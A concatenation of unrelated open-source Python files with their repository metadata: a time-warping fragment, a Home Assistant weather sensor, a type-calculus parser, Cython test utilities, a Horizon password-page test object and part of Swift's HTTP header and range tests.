def _point_cost_sqr(v):
return np.inner(v, v)
def _cost_vector(cost, ref, mov, point_norm):
for i in range(len(mov)):
diff = ref - mov[i]
cost[i] = point_norm(diff)
def _row_prediction(row, cost, prev_row):
for i in range(1, len(row)):
row[i] = cost[i-1] + min(prev_row[i-1], prev_row[i])
def _row_adjustment(row, cost):
for j in range(1, len(row)):
if row[j-1] + cost[j-1] < row[j]: # is true more often than not
row[j] = row[j-1] + cost[j-1]
| mit |
PetePriority/home-assistant | homeassistant/components/bloomsky/sensor.py | 4 | 3092 | """
Support the sensor of a BloomSky weather station.
For more details about this component, please refer to the documentation at
https://home-assistant.io/components/sensor.bloomsky/
"""
import logging
import voluptuous as vol
from homeassistant.components.sensor import PLATFORM_SCHEMA
from homeassistant.const import (TEMP_FAHRENHEIT, CONF_MONITORED_CONDITIONS)
from homeassistant.helpers.entity import Entity
import homeassistant.helpers.config_validation as cv
_LOGGER = logging.getLogger(__name__)
DEPENDENCIES = ['bloomsky']
# These are the available sensors
SENSOR_TYPES = ['Temperature',
'Humidity',
'Pressure',
'Luminance',
'UVIndex',
'Voltage']
# Sensor units - these do not currently align with the API documentation
SENSOR_UNITS = {'Temperature': TEMP_FAHRENHEIT,
'Humidity': '%',
'Pressure': 'inHg',
'Luminance': 'cd/m²',
'Voltage': 'mV'}
# Which sensors to format numerically
FORMAT_NUMBERS = ['Temperature', 'Pressure', 'Voltage']
PLATFORM_SCHEMA = PLATFORM_SCHEMA.extend({
vol.Optional(CONF_MONITORED_CONDITIONS, default=SENSOR_TYPES):
vol.All(cv.ensure_list, [vol.In(SENSOR_TYPES)]),
})
def setup_platform(hass, config, add_entities, discovery_info=None):
    """Set up the available BloomSky weather sensors.

    Creates one BloomSkySensor per (device, monitored condition) pair and
    registers them all with a single add_entities call instead of one call
    per entity, which avoids repeated platform-update round trips.
    """
    bloomsky = hass.components.bloomsky
    # Default needed in case of discovery
    sensors = config.get(CONF_MONITORED_CONDITIONS, SENSOR_TYPES)

    entities = [
        BloomSkySensor(bloomsky.BLOOMSKY, device, variable)
        for device in bloomsky.BLOOMSKY.devices.values()
        for variable in sensors
    ]
    # update_before_add=True preserved from the original per-entity calls.
    add_entities(entities, True)
class BloomSkySensor(Entity):
    """Representation of a single sensor in a BloomSky device."""

    def __init__(self, bs, device, sensor_name):
        """Initialize a BloomSky sensor from a device record."""
        self._bloomsky = bs
        self._sensor_name = sensor_name
        self._device_id = device['DeviceID']
        self._state = None
        # Entity name is "<device name> <sensor>"; the unique id combines
        # the device id and the sensor name.
        self._name = '{} {}'.format(device['DeviceName'], sensor_name)
        self._unique_id = '{}-{}'.format(self._device_id, self._sensor_name)

    @property
    def unique_id(self):
        """Return a unique ID."""
        return self._unique_id

    @property
    def name(self):
        """Return the name of the BloomSky device and this sensor."""
        return self._name

    @property
    def state(self):
        """Return the current state, eg. value, of this sensor."""
        return self._state

    @property
    def unit_of_measurement(self):
        """Return the sensor units."""
        # dict.get defaults to None for sensors without a declared unit.
        return SENSOR_UNITS.get(self._sensor_name)

    def update(self):
        """Request an update from the BloomSky API."""
        self._bloomsky.refresh_devices()
        reading = \
            self._bloomsky.devices[self._device_id]['Data'][self._sensor_name]
        # Numeric sensors are rendered with two decimal places.
        if self._sensor_name in FORMAT_NUMBERS:
            reading = '{0:.2f}'.format(reading)
        self._state = reading
| apache-2.0 |
habibutsu/tapl-py | rcdsubbot/parser.py | 1 | 7288 | import ply.yacc as yacc
from lexer import Lexer
import syntax
"""
Commands
: Command SEMI
| Command SEMI Commands
Command
: Term
| LCID Binder
Binder
: COLON Type
PathTerm : PathTerm DOT LCID
| PathTerm DOT INTV
| ATerm
Type
: ArrowType
AType : LPAREN Type RPAREN
| LCURLY FieldTypes RCURLY
| TTOP
| TBOT
FieldTypes :
| NEFieldTypes
NEFieldTypes:
| FieldType
| FieldType COMMA NEFieldTypes
FieldType : LCID COLON Type
| Type
ArrowType : AType ARROW ArrowType
| AType
Term
: AppTerm
| LAMBDA LCID COLON Type new_scope DOT Term end_scope
| LAMBDA USCORE COLON Type new_scope DOT Term end_scope
AppTerm
: PathTerm
| AppTerm PathTerm
ATerm
: LPAREN Term RPAREN
| LCID
| LCURLY Fields RCURLY
Fields
:
| NEFields
NEFields
: Field
| Field COMMA NEFields
Field
: LCID EQ Term
| Term
"""
class Parser:
    """LALR parser for the rcdsubbot calculus, built on PLY's yacc.

    IMPORTANT: the docstring of every ``p_*`` method below IS the grammar
    rule that PLY extracts by introspection.  Those strings are functional,
    not documentation, and must never be reworded.
    """

    def __init__(self, debug=False):
        # yacc.yacc(module=self) introspects this instance's `tokens`
        # attribute and p_* methods to build the parse tables.
        self.lexer = Lexer()
        self.tokens = self.lexer.tokens
        self.debug = debug
        self.parser = yacc.yacc(module=self, debug=debug)

    def parse(self, text, filename=""):
        # _ctx holds the naming context (innermost binding last) used to
        # resolve variables to de Bruijn indices; _scope_comma_cnt is a
        # stack of per-record-literal comma counters used to number
        # positional (unlabelled) fields.
        self._ctx = []
        self._scope_comma_cnt = []
        self.filename = filename
        return self.parser.parse(
            text, debug=self.debug, lexer=self.lexer.lexer, tracking=True)

    # Commands
    def p_Commands_Command(self, p):
        "Commands : Command SEMI"
        p[0] = [p[1]]

    def p_Commands_Command_Commands(self, p):
        "Commands : Command SEMI Commands"
        p[0] = [p[1]] + p[3]

    # Command
    def p_Command_LCID_Binder(self, p):
        "Command : LCID Binder"
        # The binding is added eagerly so later commands can reference it.
        self.addbinding(p[1], p[2])
        p[0] = syntax.Bind(self._info(p), p[1], p[2])

    def p_Command_Term(self, p):
        "Command : Term"
        p[0] = syntax.Eval(self._info(p), p[1])

    # Binder
    def p_Binder_COLON_Type(self, p):
        "Binder : COLON Type"
        p[0] = syntax.VarBind(p[2])

    # Type
    def p_Type_ArrowType(self, p):
        "Type : ArrowType"
        p[0] = p[1]

    # AType
    def p_AType_Complex(self, p):
        "AType : LPAREN Type RPAREN"
        p[0] = p[2]

    def p_AType_LCURLY_FieldTypes_RCURLY(self, p):
        "AType : LCURLY AType_LCURLY FieldTypes RCURLY AType_RCURLY"
        p[0] = syntax.TyRecord(p[3])

    def p_AType_TTOP(self, p):
        "AType : TTOP"
        p[0] = syntax.TyTop()

    def p_AType_TBOT(self, p):
        "AType : TBOT"
        p[0] = syntax.TyBot()

    # Helper functions
    # Empty "marker" productions: push/pop a fresh comma counter so nested
    # record types number their positional fields independently.
    def p_AType_LCURLY(self, p):
        "AType_LCURLY :"
        self._scope_comma_cnt.append(0)

    def p_AType_RCURLY(self, p):
        "AType_RCURLY :"
        self._scope_comma_cnt.pop()

    # FieldTypes
    def p_FieldTypes(self, p):
        "FieldTypes : "
        p[0] = []

    def p_FieldTypes_NEFieldTypes(self, p):
        "FieldTypes : NEFieldTypes"
        p[0] = p[1]

    # NEFieldTypes
    def p_NEFieldTypes_FieldType(self, p):
        "NEFieldTypes : FieldType"
        p[0] = [p[1]]

    def p_NEFieldTypes_FieldType_COMMA_NEFieldTypes(self, p):
        "NEFieldTypes : FieldType COMMA FieldType_comma NEFieldTypes"
        p[4].append(p[1])
        p[0] = p[4]

    def p_FieldType_comma(self, p):
        "FieldType_comma :"
        # Count a comma in the innermost record-type scope.
        self._scope_comma_cnt[-1] += 1

    # FieldType
    def p_FieldType_LCID_COLON_Type(self, p):
        "FieldType : LCID COLON Type"
        p[0] = (p[1], p[3])

    def p_FieldType_Type(self, p):
        "FieldType : Type"
        # Unlabelled field: use its 1-based position as the label.
        i = self._scope_comma_cnt[-1]
        p[0] = (i+1, p[1])

    # ArrowType
    def p_ArrowType_Arrow(self, p):
        "ArrowType : AType ARROW ArrowType"
        p[0] = syntax.TyArr(p[1], p[3])

    def p_ArrowType_AType(self, p):
        "ArrowType : AType"
        p[0] = p[1]

    # Term
    def p_Term_AppTerm(self, p):
        "Term : AppTerm"
        p[0] = p[1]

    def p_Term_LAMBDA_LCID(self, p):
        "Term : LAMBDA LCID COLON Type lambda_new_scope DOT Term lambda_end_scope"
        p[0] = syntax.TmAbs(
            self._info(p), p[2], p[4], p[7])

    def p_Term_LAMBDA_USCORE(self, p):
        "Term : LAMBDA USCORE COLON Type lambda_new_scope DOT Term lambda_end_scope"
        p[0] = syntax.TmAbs(self._info(p), "_", p[4], p[7])

    def p_lambda_new_scope(self, p):
        "lambda_new_scope :"
        # p[-3] is the bound variable (LCID/USCORE) three symbols back;
        # push it before the body is parsed so it resolves in the body.
        self.addname(p[-3])

    def p_lambda_end_scope(self, p):
        "lambda_end_scope :"
        self._ctx.pop()

    # AppTerm
    def p_AppTerm_PathTerm(self, p):
        "AppTerm : PathTerm"
        p[0] = p[1]

    def p_AppTerm_AppTerm_PathTerm(self, p):
        "AppTerm : AppTerm PathTerm"
        p[0] = syntax.TmApp(self._info(p), p[1], p[2])

    # PathTerm
    def p_PathTerm_DOT_LCID(self, p):
        "PathTerm : PathTerm DOT LCID"
        p[0] = syntax.TmProj(self._info(p), p[1], p[3])

    def p_PathTerm_DOT_INTV(self, p):
        "PathTerm : PathTerm DOT INTV"
        # Numeric projection targets a positional field label.
        p[0] = syntax.TmProj(self._info(p), p[1], int(p[3]))

    def p_PathTerm_Aterm(self, p):
        "PathTerm : ATerm"
        p[0] = p[1]

    # ATerm
    def p_ATerm_Term(self, p):
        "ATerm : LPAREN Term RPAREN"
        p[0] = p[2]

    def p_ATerm_LCID(self, p):
        "ATerm : LCID"
        # Variables are stored as (de Bruijn index, context length).
        p[0] = syntax.TmVar(
            self._info(p),
            self.name2index(p[1]),
            len(self._ctx))

    def p_ATerm_Fields(self, p):
        "ATerm : LCURLY ATerm_LCURLY Fields RCURLY ATerm_RCURLY"
        p[0] = syntax.TmRecord(self._info(p), p[3])

    # Helpers
    # Marker productions mirroring AType_LCURLY/RCURLY for record terms.
    def p_ATerm_LCURLY(self, p):
        "ATerm_LCURLY :"
        self._scope_comma_cnt.append(0)

    def p_ATerm_RCURLY(self, p):
        "ATerm_RCURLY :"
        self._scope_comma_cnt.pop()

    # Fields
    def p_Fields(self, p):
        "Fields :"
        p[0] = []

    def p_Fields_NEFields(self, p):
        "Fields : NEFields"
        p[0] = p[1]

    # NEFields
    def p_NEFields_Field(self, p):
        "NEFields : Field"
        p[0] = [p[1]]

    def p_NEFields_Field_COMMA_NEFields(self, p):
        "NEFields : Field COMMA Field_comma NEFields"
        p[4].append(p[1])
        p[0] = p[4]

    def p_Field_comma(self, p):
        "Field_comma : "
        self._scope_comma_cnt[-1] += 1

    # Field
    def p_Field_LCID_EQ_Term(self, p):
        "Field : LCID EQ Term"
        p[0] = (p[1], p[3])

    def p_Field_Term(self, p):
        "Field : Term"
        # Unlabelled record field: 1-based positional label.
        i = self._scope_comma_cnt[-1]
        p[0] = (i+1, p[1])

    # Common helper functions
    def p_error(self, p):
        # NOTE(review): PLY hands p_error a LexToken (whose .lineno is an
        # int attribute, not a method) or None at end of input; _info(p)
        # calls p.lineno(1), which looks like it would raise here -- TODO
        # confirm against the ply.yacc error-handling docs.
        self._error("Syntax error", self._info(p))

    def _error(self, msg, info):
        raise SystemError(msg, info)

    def addbinding(self, name, bind):
        # Delegate context management to the syntax module.
        syntax.addbinding(self._ctx, name, bind)

    def addname(self, name):
        self.addbinding(name, syntax.NameBind())

    def isnamebound(self, name):
        return syntax.isnamebound(self._ctx, name)

    def name2index(self, name):
        return syntax.name2index(self._ctx, name)

    def _info(self, p):
        # Source position of the first symbol of the production.
        return syntax.Info(self.filename, p.lineno(1))
| mit |
mcanthony/cython | Cython/TestUtils.py | 13 | 7698 | import Cython.Compiler.Errors as Errors
from Cython.CodeWriter import CodeWriter
from Cython.Compiler.TreeFragment import TreeFragment, strip_common_indent
from Cython.Compiler.Visitor import TreeVisitor, VisitorTransform
from Cython.Compiler import TreePath
import unittest
import os, sys
import tempfile
class NodeTypeWriter(TreeVisitor):
    """Visitor that records each node's class name, indented by tree depth."""

    def __init__(self):
        super(NodeTypeWriter, self).__init__()
        self._indents = 0
        self.result = []

    def visit_Node(self, node):
        # Label the node by the attribute (and optional index) through
        # which it was reached; the tree root has no access path.
        if not self.access_path:
            label = u"(root)"
        else:
            tip = self.access_path[-1]
            if tip[2] is None:
                label = tip[1]
            else:
                label = u"%s[%d]" % tip[1:3]

        self.result.append(u"  " * self._indents +
                           u"%s: %s" % (label, node.__class__.__name__))
        self._indents += 1
        self.visitchildren(node)
        self._indents -= 1
def treetypes(root):
    """Return a newline-joined string of node class names for *root*.

    The result carries a leading and a trailing newline so that it can be
    compared by simple string comparison while keeping test fixtures
    readable.
    """
    writer = NodeTypeWriter()
    writer.visit(root)
    lines = [u""] + writer.result + [u""]
    return u"\n".join(lines)
class CythonTest(unittest.TestCase):
    """Base class for Cython unit tests.

    Silences the compiler's listing/echo output for the duration of each
    test and provides helpers for line-by-line code comparison, tree
    fragment construction and exception assertions.
    """

    def setUp(self):
        # Mute compiler error output while the test runs.
        self.listing_file = Errors.listing_file
        self.echo_file = Errors.echo_file
        Errors.listing_file = Errors.echo_file = None

    def tearDown(self):
        Errors.listing_file = self.listing_file
        Errors.echo_file = self.echo_file

    def assertLines(self, expected, result):
        "Checks that the given strings or lists of strings are equal line by line"
        if not isinstance(expected, list):
            expected = expected.split(u"\n")
        if not isinstance(result, list):
            result = result.split(u"\n")
        for idx, (expected_line, result_line) in enumerate(zip(expected, result)):
            self.assertEqual(expected_line, result_line,
                             "Line %d:\nExp: %s\nGot: %s" % (idx, expected_line, result_line))
        # BUGFIX: the failure message used to print the expected lines under
        # "Got" and the actual result under "Expected" -- arguments swapped.
        self.assertEqual(len(expected), len(result),
                         "Unmatched lines. Got:\n%s\nExpected:\n%s" % (
                             u"\n".join(result), u"\n".join(expected)))

    def codeToLines(self, tree):
        # Serialize *tree* back to Cython source lines.
        writer = CodeWriter()
        writer.write(tree)
        return writer.result.lines

    def codeToString(self, tree):
        return "\n".join(self.codeToLines(tree))

    def assertCode(self, expected, result_tree):
        """Serialize *result_tree* and compare it to *expected* line by line
        (after stripping the common indentation from *expected*)."""
        result_lines = self.codeToLines(result_tree)
        expected_lines = strip_common_indent(expected.split("\n"))
        for idx, (line, expected_line) in enumerate(zip(result_lines, expected_lines)):
            self.assertEqual(expected_line, line,
                             "Line %d:\nGot: %s\nExp: %s" % (idx, line, expected_line))
        self.assertEqual(len(result_lines), len(expected_lines),
                         "Unmatched lines. Got:\n%s\nExpected:\n%s" % (
                             "\n".join(result_lines), expected))

    def assertNodeExists(self, path, result_tree):
        self.assertNotEqual(TreePath.find_first(result_tree, path), None,
                            "Path '%s' not found in result tree" % path)

    def fragment(self, code, pxds=None, pipeline=None):
        "Simply create a tree fragment using the name of the test-case in parse errors."
        # BUGFIX: the previous defaults ``pxds={}, pipeline=[]`` were shared
        # mutable default arguments; create fresh ones per call instead.
        if pxds is None:
            pxds = {}
        if pipeline is None:
            pipeline = []
        name = self.id()
        if name.startswith("__main__."):
            name = name[len("__main__."):]
        name = name.replace(".", "_")
        return TreeFragment(code, name, pxds, pipeline=pipeline)

    def treetypes(self, root):
        return treetypes(root)

    def should_fail(self, func, exc_type=Exception):
        """Calls "func" and fails if it doesn't raise the right exception
        (any exception by default). Also returns the exception in question.
        """
        # BUGFIX: self.fail() raises AssertionError, which is a subclass of
        # Exception -- with the default exc_type the old implementation
        # caught its own failure and "passed".  Fail outside the try block.
        try:
            func()
        except exc_type as e:
            return e
        self.fail("Expected an exception of type %r" % exc_type)

    def should_not_fail(self, func):
        """Calls func and succeeds if and only if no exception is raised
        (i.e. converts exception raising into a failed testcase). Returns
        the return value of func."""
        try:
            return func()
        except:
            # Deliberately broad: any raised exception becomes a failure.
            self.fail(str(sys.exc_info()[1]))
class TransformTest(CythonTest):
    """
    Utility base class for transform unit tests. It is based around constructing
    test trees (either explicitly or by parsing a Cython code string); running
    the transform, serialize it using a customized Cython serializer (with
    special markup for nodes that cannot be represented in Cython),
    and do a string-comparison line-by-line of the result.

    To create a test case:
     - Call run_pipeline. The pipeline should at least contain the transform you
       are testing; pyx should be either a string (passed to the parser to
       create a post-parse tree) or a node representing input to pipeline.
       The result will be a transformed result.

     - Check that the tree is correct. If wanted, assertCode can be used, which
       takes a code string as expected, and a ModuleNode in result_tree
       (it serializes the ModuleNode to a string and compares line-by-line).

    All code strings are first stripped for whitespace lines and then common
    indentation.

    Plans: One could have a pxd dictionary parameter to run_pipeline.
    """

    def run_pipeline(self, pipeline, pyx, pxds=None):
        """Parse *pyx* into a fragment tree and apply each transform in
        *pipeline* to it in order; return the final tree.

        BUGFIX: *pxds* previously defaulted to a shared mutable ``{}``;
        an empty dict is now created per call.
        """
        if pxds is None:
            pxds = {}
        tree = self.fragment(pyx, pxds).root
        # Run pipeline
        for T in pipeline:
            tree = T(tree)
        return tree
class TreeAssertVisitor(VisitorTransform):
    """Pipeline stage that enforces the ``test_assert_path_exists`` /
    ``test_fail_if_path_exists`` compiler directives by checking TreePath
    expressions against the (partially) transformed tree."""
    # actually, a TreeVisitor would be enough, but this needs to run
    # as part of the compiler pipeline

    def visit_CompilerDirectivesNode(self, node):
        directives = node.directives
        if 'test_assert_path_exists' in directives:
            for path in directives['test_assert_path_exists']:
                if TreePath.find_first(node, path) is None:
                    # Report through the compiler's error machinery so the
                    # failure surfaces like any other compile error.
                    Errors.error(
                        node.pos,
                        "Expected path '%s' not found in result tree" % path)
        if 'test_fail_if_path_exists' in directives:
            for path in directives['test_fail_if_path_exists']:
                if TreePath.find_first(node, path) is not None:
                    Errors.error(
                        node.pos,
                        "Unexpected path '%s' found in result tree" % path)
        self.visitchildren(node)
        return node

    # All other node types are traversed without modification.
    visit_Node = VisitorTransform.recurse_to_children
def unpack_source_tree(tree_file, dir=None):
    """Unpack a "source tree" file into *dir* and return ``(dir, header)``.

    *tree_file* is a text file in which marker lines of the form
    ``##### path/to/file #####`` introduce embedded files; every subsequent
    line is written verbatim to that path below *dir* (created with
    tempfile.mkdtemp() when not given) until the next marker.  Lines before
    the first marker that are neither blank, ``#`` comments nor bare
    triple-quotes are collected into the returned *header* string.
    """
    if dir is None:
        dir = tempfile.mkdtemp()
    header = []
    cur_file = None
    # Read the whole tree file up front with a context manager instead of
    # the manual open/close/del dance.
    with open(tree_file) as f:
        lines = f.readlines()
    try:
        for line in lines:
            if line.startswith('#####'):
                # Start of a new embedded file; derive its relative path.
                filename = line.strip().strip('#').strip().replace(
                    '/', os.path.sep)
                path = os.path.join(dir, filename)
                dirname = os.path.dirname(path)
                if not os.path.exists(dirname):
                    os.makedirs(dirname)
                if cur_file is not None:
                    cur_file.close()
                cur_file = open(path, 'w')
            elif cur_file is not None:
                cur_file.write(line)
            elif line.strip() and not line.lstrip().startswith('#'):
                if line.strip() not in ('"""', "'''"):
                    header.append(line)
    finally:
        # Ensure the last (or partially written) file is closed even if a
        # write or makedirs call above raised.
        if cur_file is not None:
            cur_file.close()
    return dir, ''.join(header)
| apache-2.0 |
redhat-cip/horizon | openstack_dashboard/test/integration_tests/pages/settings/changepasswordpage.py | 5 | 2004 | # Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from selenium.webdriver.common import by
from openstack_dashboard.test.integration_tests.pages import basepage
from openstack_dashboard.test.integration_tests.regions import forms
class ChangepasswordPage(basepage.BaseNavigationPage):
    """Page object for the dashboard's "Change Password" settings page."""

    _password_form_locator = (by.By.ID, 'change_password_modal')

    # Field names must match the form inputs inside the modal element.
    CHANGE_PASSWORD_FORM_FIELDS = ("current_password", "new_password",
                                   "confirm_password")

    @property
    def password_form(self):
        # Wrap the modal element in a FormRegion for typed field access.
        src_elem = self._get_element(*self._password_form_locator)
        return forms.FormRegion(self.driver, self.conf, src_elem,
                                self.CHANGE_PASSWORD_FORM_FIELDS)

    def change_password(self, current, new):
        """Fill in and submit the change-password form, then wait for the
        confirmation popups to disappear."""
        self.password_form.current_password.text = current
        self.password_form.new_password.text = new
        self.password_form.confirm_password.text = new
        self.password_form.submit.click()
        self.wait_till_popups_disappear()

    def reset_to_default_password(self, current):
        """Change the password back to the configured default, picking the
        admin or regular password based on the user shown in the topbar."""
        if self.topbar.user.text == self.conf.identity.admin_username:
            return self.change_password(current,
                                        self.conf.identity.admin_password)
        else:
            return self.change_password(current,
                                        self.conf.identity.password)
| apache-2.0 |
zackmdavis/swift | test/unit/common/test_swob.py | 2 | 72249 | # Copyright (c) 2012 OpenStack Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"Tests for swift.common.swob"
import datetime
import unittest
import re
import time
from StringIO import StringIO
from urllib import quote
import swift.common.swob
from swift.common import utils, exceptions
class TestHeaderEnvironProxy(unittest.TestCase):
    """Tests for swob.HeaderEnvironProxy: a dict-like view that maps HTTP
    header names onto the corresponding WSGI environ keys (CONTENT_LENGTH,
    CONTENT_TYPE, HTTP_*)."""

    def test_proxy(self):
        environ = {}
        proxy = swift.common.swob.HeaderEnvironProxy(environ)
        proxy['Content-Length'] = 20
        proxy['Content-Type'] = 'text/plain'
        proxy['Something-Else'] = 'somevalue'
        self.assertEquals(
            proxy.environ, {'CONTENT_LENGTH': '20',
                            'CONTENT_TYPE': 'text/plain',
                            'HTTP_SOMETHING_ELSE': 'somevalue'})
        self.assertEquals(proxy['content-length'], '20')
        self.assertEquals(proxy['content-type'], 'text/plain')
        self.assertEquals(proxy['something-else'], 'somevalue')

    def test_del(self):
        environ = {}
        proxy = swift.common.swob.HeaderEnvironProxy(environ)
        proxy['Content-Length'] = 20
        proxy['Content-Type'] = 'text/plain'
        proxy['Something-Else'] = 'somevalue'
        del proxy['Content-Length']
        del proxy['Content-Type']
        del proxy['Something-Else']
        self.assertEquals(proxy.environ, {})

    def test_contains(self):
        environ = {}
        proxy = swift.common.swob.HeaderEnvironProxy(environ)
        proxy['Content-Length'] = 20
        proxy['Content-Type'] = 'text/plain'
        proxy['Something-Else'] = 'somevalue'
        self.assert_('content-length' in proxy)
        self.assert_('content-type' in proxy)
        self.assert_('something-else' in proxy)

    def test_keys(self):
        environ = {}
        proxy = swift.common.swob.HeaderEnvironProxy(environ)
        proxy['Content-Length'] = 20
        proxy['Content-Type'] = 'text/plain'
        proxy['Something-Else'] = 'somevalue'
        # keys() returns canonical header casing regardless of how the
        # values were set.
        self.assertEquals(
            set(proxy.keys()),
            set(('Content-Length', 'Content-Type', 'Something-Else')))
class TestHeaderKeyDict(unittest.TestCase):
    """Tests for swob.HeaderKeyDict: a case-insensitive dict for HTTP
    headers that stringifies values and canonicalizes key casing."""

    def test_case_insensitive(self):
        headers = swift.common.swob.HeaderKeyDict()
        headers['Content-Length'] = 0
        headers['CONTENT-LENGTH'] = 10
        headers['content-length'] = 20
        self.assertEquals(headers['Content-Length'], '20')
        self.assertEquals(headers['content-length'], '20')
        self.assertEquals(headers['CONTENT-LENGTH'], '20')

    def test_setdefault(self):
        headers = swift.common.swob.HeaderKeyDict()

        # it gets set
        headers.setdefault('x-rubber-ducky', 'the one')
        self.assertEquals(headers['X-Rubber-Ducky'], 'the one')

        # it has the right return value
        ret = headers.setdefault('x-boat', 'dinghy')
        self.assertEquals(ret, 'dinghy')

        ret = headers.setdefault('x-boat', 'yacht')
        self.assertEquals(ret, 'dinghy')

        # shouldn't crash
        headers.setdefault('x-sir-not-appearing-in-this-request', None)

    def test_del_contains(self):
        headers = swift.common.swob.HeaderKeyDict()
        headers['Content-Length'] = 0
        self.assert_('Content-Length' in headers)
        del headers['Content-Length']
        self.assert_('Content-Length' not in headers)

    def test_update(self):
        headers = swift.common.swob.HeaderKeyDict()
        # update() accepts both mappings and iterables of pairs.
        headers.update({'Content-Length': '0'})
        headers.update([('Content-Type', 'text/plain')])
        self.assertEquals(headers['Content-Length'], '0')
        self.assertEquals(headers['Content-Type'], 'text/plain')

    def test_get(self):
        headers = swift.common.swob.HeaderKeyDict()
        headers['content-length'] = 20
        self.assertEquals(headers.get('CONTENT-LENGTH'), '20')
        self.assertEquals(headers.get('something-else'), None)
        self.assertEquals(headers.get('something-else', True), True)

    def test_keys(self):
        headers = swift.common.swob.HeaderKeyDict()
        headers['content-length'] = 20
        headers['cOnTent-tYpe'] = 'text/plain'
        headers['SomeThing-eLse'] = 'somevalue'
        self.assertEquals(
            set(headers.keys()),
            set(('Content-Length', 'Content-Type', 'Something-Else')))
class TestRange(unittest.TestCase):
    """Tests for swob.Range: parsing of HTTP Range headers and resolution
    of the requested byte ranges against a known entity length
    (ranges_for_length returns half-open (start, stop) pairs)."""

    def test_range(self):
        range = swift.common.swob.Range('bytes=1-7')
        self.assertEquals(range.ranges[0], (1, 7))

    def test_upsidedown_range(self):
        # A range starting beyond the entity is unsatisfiable -> [].
        range = swift.common.swob.Range('bytes=5-10')
        self.assertEquals(range.ranges_for_length(2), [])

    def test_str(self):
        for range_str in ('bytes=1-7', 'bytes=1-', 'bytes=-1',
                          'bytes=1-7,9-12', 'bytes=-7,9-'):
            range = swift.common.swob.Range(range_str)
            self.assertEquals(str(range), range_str)

    def test_ranges_for_length(self):
        range = swift.common.swob.Range('bytes=1-7')
        self.assertEquals(range.ranges_for_length(10), [(1, 8)])
        self.assertEquals(range.ranges_for_length(5), [(1, 5)])
        self.assertEquals(range.ranges_for_length(None), None)

    def test_ranges_for_large_length(self):
        range = swift.common.swob.Range('bytes=-1000000000000000000000000000')
        self.assertEquals(range.ranges_for_length(100), [(0, 100)])

    def test_ranges_for_length_no_end(self):
        range = swift.common.swob.Range('bytes=1-')
        self.assertEquals(range.ranges_for_length(10), [(1, 10)])
        self.assertEquals(range.ranges_for_length(5), [(1, 5)])
        self.assertEquals(range.ranges_for_length(None), None)
        # This used to freak out:
        range = swift.common.swob.Range('bytes=100-')
        self.assertEquals(range.ranges_for_length(5), [])
        self.assertEquals(range.ranges_for_length(None), None)

        range = swift.common.swob.Range('bytes=4-6,100-')
        self.assertEquals(range.ranges_for_length(5), [(4, 5)])

    def test_ranges_for_length_no_start(self):
        # Suffix byte range specs (bytes=-N) count from the end.
        range = swift.common.swob.Range('bytes=-7')
        self.assertEquals(range.ranges_for_length(10), [(3, 10)])
        self.assertEquals(range.ranges_for_length(5), [(0, 5)])
        self.assertEquals(range.ranges_for_length(None), None)

        range = swift.common.swob.Range('bytes=4-6,-100')
        self.assertEquals(range.ranges_for_length(5), [(4, 5), (0, 5)])

    def test_ranges_for_length_multi(self):
        range = swift.common.swob.Range('bytes=-20,4-')
        self.assertEquals(len(range.ranges_for_length(200)), 2)

        # the actual length greater than each range element
        self.assertEquals(range.ranges_for_length(200), [(180, 200), (4, 200)])

        range = swift.common.swob.Range('bytes=30-150,-10')
        self.assertEquals(len(range.ranges_for_length(200)), 2)

        # the actual length lands in the middle of a range
        self.assertEquals(range.ranges_for_length(90), [(30, 90), (80, 90)])

        # the actual length greater than any of the range
        self.assertEquals(range.ranges_for_length(200),
                          [(30, 151), (190, 200)])

        self.assertEquals(range.ranges_for_length(None), None)

    def test_ranges_for_length_edges(self):
        range = swift.common.swob.Range('bytes=0-1, -7')
        self.assertEquals(range.ranges_for_length(10),
                          [(0, 2), (3, 10)])

        range = swift.common.swob.Range('bytes=-7, 0-1')
        self.assertEquals(range.ranges_for_length(10),
                          [(3, 10), (0, 2)])

        range = swift.common.swob.Range('bytes=-7, 0-1')
        self.assertEquals(range.ranges_for_length(5),
                          [(0, 5), (0, 2)])

    def test_ranges_for_length_overlapping(self):
        # Fewer than 3 overlaps is okay
        range = swift.common.swob.Range('bytes=10-19,15-24')
        self.assertEquals(range.ranges_for_length(100),
                          [(10, 20), (15, 25)])
        range = swift.common.swob.Range('bytes=10-19,15-24,20-29')
        self.assertEquals(range.ranges_for_length(100),
                          [(10, 20), (15, 25), (20, 30)])

        # Adjacent ranges, though suboptimal, don't overlap
        range = swift.common.swob.Range('bytes=10-19,20-29,30-39')
        self.assertEquals(range.ranges_for_length(100),
                          [(10, 20), (20, 30), (30, 40)])

        # Ranges that share a byte do overlap
        range = swift.common.swob.Range('bytes=10-20,20-30,30-40,40-50')
        self.assertEquals(range.ranges_for_length(100), [])

        # With suffix byte range specs (e.g. bytes=-2), make sure that we
        # correctly determine overlapping-ness based on the entity length
        range = swift.common.swob.Range('bytes=10-15,15-20,30-39,-9')
        self.assertEquals(range.ranges_for_length(100),
                          [(10, 16), (15, 21), (30, 40), (91, 100)])
        self.assertEquals(range.ranges_for_length(20), [])

    def test_ranges_for_length_nonascending(self):
        # Too many out-of-order ranges makes the whole header invalid.
        few_ranges = ("bytes=100-109,200-209,300-309,500-509,"
                      "400-409,600-609,700-709")
        many_ranges = few_ranges + ",800-809"

        range = swift.common.swob.Range(few_ranges)
        self.assertEquals(range.ranges_for_length(100000),
                          [(100, 110), (200, 210), (300, 310), (500, 510),
                           (400, 410), (600, 610), (700, 710)])

        range = swift.common.swob.Range(many_ranges)
        self.assertEquals(range.ranges_for_length(100000), [])

    def test_ranges_for_length_too_many(self):
        # At most 50 range elements are honoured.
        at_the_limit_ranges = (
            "bytes=" + ",".join("%d-%d" % (x * 1000, x * 1000 + 10)
                                for x in range(50)))
        too_many_ranges = at_the_limit_ranges + ",10000000-10000009"

